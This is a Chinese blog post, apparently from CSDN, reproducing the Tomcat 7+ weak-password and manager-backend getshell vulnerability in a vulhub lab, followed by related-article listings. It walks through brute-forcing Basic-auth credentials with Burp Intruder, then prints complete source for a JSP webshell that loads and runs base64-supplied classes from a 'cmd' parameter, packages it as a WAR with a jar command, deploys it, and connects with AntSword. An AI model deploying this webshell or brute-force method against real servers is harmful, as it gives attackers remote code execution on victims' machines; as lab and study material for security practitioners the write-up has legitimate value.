【漏洞复现】Tomcat弱口令+后台getshell

已于 2023-02-07 10:34:14 修改
阅读量686 收藏
点赞数
文章标签: tomcat servlet java
于 2023-02-07 10:23:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52450604/article/details/128914096
版权

Tomcat7+ Weak Password && Backend Getshell Vulnerability

1.弱口令

vulhub部署好靶机环境以后;

在登录窗口随机输入账号密码,如admin:123456;

打开burp抓包,发现数据包中包含了base64加密以后的账号、密码;

将数据包转发至intruder模块,在position处选择加密后的字符串作为目标

在payloads中选择custom iterator自定义迭代类型,即通过笛卡尔积得到账号密码的所有可能组合

在payload options position1中导入账号字典

在payload options position2中写入冒号:

在payload options position3中导入密码字典

最后在payload processing中Add-Encode-Baese64-encode

取消勾选URL特殊符号编码

Attack;

根据返回结果,长度不一的结果为dG9tY2F0OnRvbWNhdA==,base64解码后为tomcat:tomcat,成功爆破得到账号密码。

2.Getshell

登录到后台后可以通过部署war包进行getshell

war 包是 Sun 提出的一种 web 应用程序格式。它与 jar 类似,是很多文件的压缩包。war 包中的文件按照一定目录结构来组织。

一般其根目录下包含有 html 和 jsp 文件,或者包含有这两种文件的目录,另外还有 WEB-INF 目录。通常在 WEB-INF 目录下含有一个 web.xml 文件和一个 classes 目录。web.xml 是这个应用的配置文件,而 classes 目录下则包含编译好的 servlet 类和 jsp,或者 servlet 所依赖的其他类(如 JavaBean)。通常这些所依赖的类也可以打包成 jar 包放在 WEB-INF 下的 lib 目录下。

1.生成一个.jsp木马

<%!
      class U extends ClassLoader {
		  U(ClassLoader c){
			  super(c);
		  }
		  public Class g(byte[] b){
			  return super.defineClass(b,0,b.length);
		  }
	  }
	 public byte[] base64Decode(String str) throws Exception{
		 try{
			 Class clazz =Class.forName("sun.misc.BASE64Decoder");
			 return (byte[]) clazz.getMethod("decodeBuffer",String.class).invoke(clazz.newInstance(),str);
		 }catch (Exception e){
			 Class clazz =Class.forName("java.util.Base64");
			 Object decoder =clazz.getMethod("getDecoder").invoke(null);
			 return(byte[])decoder.getClass().getMethod("decode",String.class).invoke(decoder,str);
		 }
	 }
%>
<% 
       String cls =request.getParameter("cmd");
       if(cls != null){
         new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);	 
 }
%>

2.生成war包

jar cvf tomcat.war a.jsp

3.部署war包

4.应用列表上成功出现/tomcat

访问tomcat下的jsp文件

xxxxxxxxxxx/tomcat/a.jsp,成功访问,即部署成功。

5.蚁剑连接

xxxxxxxxxxxxx/tomcat/a.jsp

密码为cmd

测试连接,成功访问本机所有文件,拿到shell

参考文章:https://blog.csdn.net/weixin_46601374/article/details/123955886

Arongsec
关注
漏洞复现tomcat-pass-getshell 弱口令
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
08-11 515
Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开发而成。通过弱口令登录后台,部署war包geshell
vulhub中Tomcat7+ 弱口令 && 后台getshell漏洞
yougexiaojiuguan的博客
02-29 307
漏洞复现过程中的记录
漏洞复现 - - -Tomcat弱口令漏洞
weixin_67503304的博客
08-07 7611
通过弱口令的方法爆破tomcat漏洞,通过上传war包拿到shell,简单的弱口令漏洞复现
中间件安全—Tomcat常见漏洞
qq_53058639的博客
07-08 1058
链接。
Tomcat漏洞(弱口令war包)详解
xinyue9966的博客
02-17 4935
后台弱口令上传war包 影响版本:Tomcat版本:7.0–>8.0 影响说明:后台弱口令登录,上传webshell 环境说明:PHP5.5.38 、 Apache2.4.10、Tomcat 8.0.43 环境搭建 东塔靶场 漏洞原理 tomcat存在管理后台进行应用部署管理,且管理后台使用HTTP基础认证进行登录。若用户口令为弱口令,攻击者容易进行暴力破解登录后台并进行应用管理。 tomcat是一个中间件,在B/S架构中,浏览器发出的http请求经过tpmcat中间件,转发到最终的目的服务器上
Tomcat7 +弱口令&&后端Getshell漏洞
ssrf
03-14 1174
Tomcat版本:8.0 漏洞介绍: 介绍 Tomcat支持通过后端部署war文件,因此我们可以直接将webshel​​l放置到web目录中。为了访问后端,需要权限。 Tomcat7+权限分为: manager(后台管理) manager-gui 拥有html页面权限 manager-status 拥有查看status的权限 manager-script 拥有text接口的权限,和status权限 manager-jmx 拥有jmx权限,和status权限 host-manager(虚拟主机管理) a
Tomcat弱口令漏洞
qq_43665434的博客
05-16 1911
Tomcat弱口令漏洞 漏洞原理:传送门 实验环境 主机 角色 IP centos8 漏洞靶机 192.168.1.80 kali msf生成木马,接收shell 192.168.1.128 windows10 攻击机 192.168.1.120 实验流程 开启漏洞靶机centos8 # 开启docker服务 service docker start # 切换到vulhub目录 cd /usr/sbin/vulhub/tomcat/tomcat8 # 创建镜像 docker
漏洞复现(vulhub tomcat弱口令漏洞
qq_53409748的博客
02-16 787
vulhub上的tomcat弱口令漏洞
【Vulfocus解题复现tomcat-pass-getshell 弱口令
温氏效应
11-15 3803
漏洞介绍 名称:Tomcat-pass-getshell 弱口令 描述:Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开发而成。 通过弱口令登录后台,部署war包geshell 解题过程 1、打开靶场环境,并点击Manage App链接,通过弱口令登录平台,账号密码均为:tomcat 2、拖动页面,找到war上传区域,上传jsp木马: 制作jsp木马,.
Vulhub - Tomcat8 + 弱口令 && 后台getshell 漏洞复现
多崎巡礼的博客
11-08 7380
VulHubTomcat8+ 弱口令 &amp;amp;amp;&amp;amp;amp; 后台getshell 漏洞环境实验 1.启动docker镜像 docker基于Ubuntu 已搭建完成。 拉取项目git clone https://github.com/vulhub/vulhub.git 进入镜像:cd vulhub/tomcat/tomcat8/ 启动环境:docker-compose up -d 2.登录tomca...
Weblogic 弱口令 && 后台getshell漏洞 && SSRF漏洞复现 && SSRF漏洞绕过IP限制 && 任意文件上传漏洞复现(附源码)
代码讲故事
03-19 291
Weblogic 弱口令 && 后台getshell漏洞 && SSRF漏洞复现 && SSRF漏洞绕过IP限制 && 任意文件上传漏洞复现(附源码)。
Tomcat 弱口令 && 后台getshell漏洞
weixin_46601374的博客
04-05 7555
漏洞编号 VUL-2021040008 爆发时间 2018-10-10 漏洞简介 Tomcat支持在后台部署war文件,可以直接将webshell部署到web目录下。其中,欲访问后台,需要对应用户有相应权限。 影响版本 Tomcat8.x,Tomcat7.x 漏洞详情 Tomcat支持在后台部署war文件,可以直接将webshell部署到web目录下。其中,欲访问后台,需要对应用户有相应权限。 Tomcat7+权限分为: manager(后台管理) 1、manager-gui 拥
【vulhub漏洞复现Tomcat7+弱密码&&后端Getshell漏洞-03
书山上的云的博客
01-17 3628
一、漏洞描述 Tomcat 支持通过后端部署war 文件,所以我们可以直接将webshel​​l 放到web 目录中。为了访问后端,需要权限。 Tomcat7+的权限如下: 经理(后台管理) manager-gui(html页面权限) manager-status(查看状态的权限) manager-script(文本界面权限和状态权限) manager-jmx(jmx 权限和状态权限) 主机管理器(虚拟主机管理) admin-gui(html 页面权限) admin-script(文本界面权限) 可以看出
Tomcat7+ Weak Password && Backend Getshell Vulnerability(Tomcat7+弱密码&&后端Getshell漏洞
m0_46693276的博客
02-22 285
如果遇到有部署tomcat的应用,可以去访问下地址:ip+端口,一般是8080,如:http://192.168.60.131:8080。若管理员没有将tomcat的管理界面关闭,我们可以去用Burpsuite破解密码。tomcattomcat 1. 目录 1.访问tomcat 2.登录tomcat 3.找一个jsp的馬,放在jdk文件的bin目录下。(上传的馬会附在文章结尾) 4,在jdk的bin目录下,打开命令行(shift+ctrl 右键),然后输入:jar -cvf 1.war ./.
Tomcat弱口令及war包漏洞复现(保姆级教程)
m0_69043895的博客
04-21 1958
这里我们采用针对同一弱口令去爆破不同账号的方式进行猜解,将可能存在的username放入position1的位置,其次放置password在position3的位置,最后attack时爆破的顺序如下图,就不会针对同一账号锁定。CSDN上有个脚本利用的是占满tomcat缓存的方式绕过,当同一账号大于5次登录,就会采用脏数据去进行登录,直到缓存占满后,又会用剩下的可能存在的username进行登录。链接的地址是 /zip文件的前缀/文件名,比如我这里就是http://IP/shell/shell.jsp。
Tomcat弱口令爆破和后端getshell漏洞复现,网络安全开发基础课程
m0_61330806的博客
04-08 365
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
Tomcat7+ 弱口令 && 后台getshell漏洞
weixin_45653478的博客
05-11 1089
Tomcat 是一个流行的开源Web应用服务器,用于部署和运行Java Web应用程序。Tomcat 7+ 版本中存在一个安全隐患,即默认的管理员密码可能较弱或者未被修改,攻击者可以利用这一漏洞登录到Tomcat的管理后台,并上传恶意的WAR包来执行任意代码。
Tomcat 弱口令及文件上传漏洞复现
君莫hacker的博客
09-16 3405
目录0x01 漏洞介绍0x02 环境部署:0x03 漏洞复现 0x01 漏洞介绍 漏洞描述 漏洞编号 受影响版本 0x02 环境部署: 搭建一次,复现百次 靶机 ip:192.168.30.209 kali ip:192.168.30.182 0x03 漏洞复现 从github下载tomcat8的源码,我们可以查看到tomcat的默认登录名为tomcat,并且密码也为tomcat 点击Server Status进行登录 弱口令tomcat tomcat 直接登录成功 发现文件上传点
【vulhub】Tomcat弱口令 && 后台war包Getshell
qq_45300786的博客
04-16 484
简介 Tomcat版本:8.0 环境说明 Tomcat支持在后台部署war文件,可以直接将webshell部署到web目录下。其中,欲访问后台,需要对应用户有相应权限。 Tomcat7+权限分为: manager(后台管理) manager-gui 拥有html页面权限 manager-status 拥有查看status的权限 manager-script 拥有text接口的权限,和status权限 manager-jmx 拥有jmx权限,和status权限 host-manager(虚拟主机管理) adm
tomcat弱口令登入后台漏洞复现
最新发布
07-13
1. **查找漏洞信息**:首先确认该Tomcat版本是否存在已知的弱口令漏洞,这通常可以在安全公告、官方文档或漏洞数据库(如CVE)中找到。 2. **目标环境设置**:确定你的目标Tomcat服务器的IP地址、端口号以及默认...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值